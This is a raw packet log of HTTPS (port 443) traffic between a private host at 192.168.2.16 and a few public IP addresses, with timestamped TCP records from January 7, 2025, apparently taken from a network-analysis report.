                                                                Jan 7, 2025 22:36:02.992537975 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.992539883 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.992548943 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.992587090 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.992657900 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.992692947 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.992697001 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.992815971 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.992849112 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.992854118 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.993577957 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.993608952 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.993622065 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.993626118 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.993658066 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.993663073 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.994487047 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.994514942 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.994540930 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.994543076 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.994551897 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.994570971 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.995151043 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.995179892 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.995187998 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.995192051 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.995229006 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.995233059 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.998445034 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.998469114 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.998509884 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.998516083 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.998550892 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.998898983 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.999150991 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.999190092 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.999195099 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.999330997 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.999366999 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.999372005 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.999388933 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:02.999423981 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.999509096 CET49727443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:02.999521971 CET44349727104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.010184050 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.010215044 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.010277987 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.010771036 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.010782957 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.027812004 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.027846098 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.027925014 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.028115988 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.028131962 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.041960955 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.042165995 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.094194889 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.094263077 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.094295025 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.094312906 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.094332933 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.094374895 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.094512939 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.094572067 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.094605923 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.094615936 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.094623089 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.094664097 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.094670057 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.095357895 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.095410109 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.095417023 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.107276917 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.107341051 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.107350111 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.136745930 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.136796951 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.136873960 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.136907101 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.136981964 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.137008905 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.137023926 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.137032986 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.137070894 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.137497902 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.141518116 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.141552925 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.141580105 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.141586065 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.141594887 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.141638041 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.141644001 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.141684055 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.152935028 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.182300091 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.182312965 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.182353973 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.182372093 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.182385921 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.182430983 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.182450056 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.182492971 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.182524920 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.225181103 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.225239992 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.225270987 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.225310087 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.225323915 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.225334883 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.225351095 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.225362062 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.225403070 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.225431919 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.225445032 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.225450993 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.225466967 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.226211071 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.226264954 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.226273060 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.226514101 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.226543903 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.226557016 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.226562977 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.226597071 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.226604939 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.227157116 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.227202892 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.227209091 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.227344036 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.227374077 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.227380037 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.227386951 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.227423906 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.227430105 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.228252888 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.228287935 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.228298903 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.228306055 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.228344917 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.267700911 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.267780066 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.267832041 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.267858028 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.267910957 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.267923117 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.268781900 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.268798113 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.268865108 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.268872023 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.268925905 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.269032955 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.269454956 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.269526958 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.269716024 CET49728443192.168.2.16104.17.25.14
                                                                Jan 7, 2025 22:36:03.269732952 CET44349728104.17.25.14192.168.2.16
                                                                Jan 7, 2025 22:36:03.270133018 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.270148993 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.270198107 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.270230055 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.270237923 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.270278931 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.270297050 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.270320892 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.271939993 CET49729443192.168.2.16151.101.66.137
                                                                Jan 7, 2025 22:36:03.271956921 CET44349729151.101.66.137192.168.2.16
                                                                Jan 7, 2025 22:36:03.469033957 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.469321966 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.469338894 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.470889091 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.470978022 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.472116947 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.472193956 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.472333908 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.472340107 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.518949032 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.523839951 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.524113894 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.524131060 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.525171041 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.525237083 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.525537014 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.525610924 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.525685072 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.525693893 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.566960096 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.614447117 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614504099 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614538908 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614542961 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.614554882 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614597082 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614607096 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.614610910 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614643097 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.614646912 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614691973 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614721060 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614726067 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.614731073 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.614762068 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.614772081 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.661962032 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.661983013 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.676610947 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.676695108 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.676724911 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.676738977 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.676748991 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.676762104 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.676800013 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.676811934 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.676827908 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.676841974 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.677063942 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.677102089 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.677109003 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.681279898 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.681329966 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.681339025 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.699044943 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.699094057 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.699095011 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.699106932 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.699146986 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.699290991 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.699357033 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.699390888 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.699398994 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.699949026 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.700041056 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.700047016 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.700341940 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.700380087 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.700380087 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.700391054 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.700428009 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.700433969 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.701148033 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.701184034 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.701189041 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.701221943 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.701256990 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.701261044 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.701277971 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.701309919 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.702080965 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.702143908 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.702177048 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.702182055 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.702213049 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.702250004 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.702255964 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.702949047 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.702991962 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.702996016 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.703006983 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.703032970 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.703046083 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.703108072 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.703144073 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.703151941 CET44349730104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.703159094 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.703196049 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.703196049 CET49730443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.705167055 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.705216885 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.705276012 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.705543995 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.705559015 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.725965023 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.768740892 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.768795967 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.768837929 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.768850088 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.768896103 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.768923044 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.768934965 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.768944025 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.768982887 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.768987894 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.769615889 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.769654989 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.769669056 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.769675016 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.769717932 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.769736052 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.769769907 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.769778967 CET44349731104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.769789934 CET49731443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.773931980 CET49733443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.773976088 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:03.774055958 CET49733443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.774255037 CET49733443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:03.774269104 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.183125019 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.183418989 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.183453083 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.183799028 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.184103966 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.184171915 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.184256077 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.231333971 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.261699915 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.262001991 CET49733443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.262028933 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.262371063 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.262674093 CET49733443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.262733936 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.262825012 CET49733443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.307334900 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.343616962 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.343652010 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.343696117 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.343697071 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.343709946 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.343751907 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.343763113 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.344316006 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.344353914 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.344356060 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.344363928 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.344403028 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.344409943 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.345093012 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.345139027 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.345149040 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.396934032 CET49732443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.396941900 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.397228956 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.397304058 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.397347927 CET49733443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.397968054 CET49733443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.397984028 CET44349733104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.400878906 CET49734443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.400906086 CET44349734104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.400980949 CET49734443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.401220083 CET49734443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:04.401232958 CET44349734104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.434070110 CET44349732104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:04.434106112 CET44349732104.18.95.41192.168.2.16
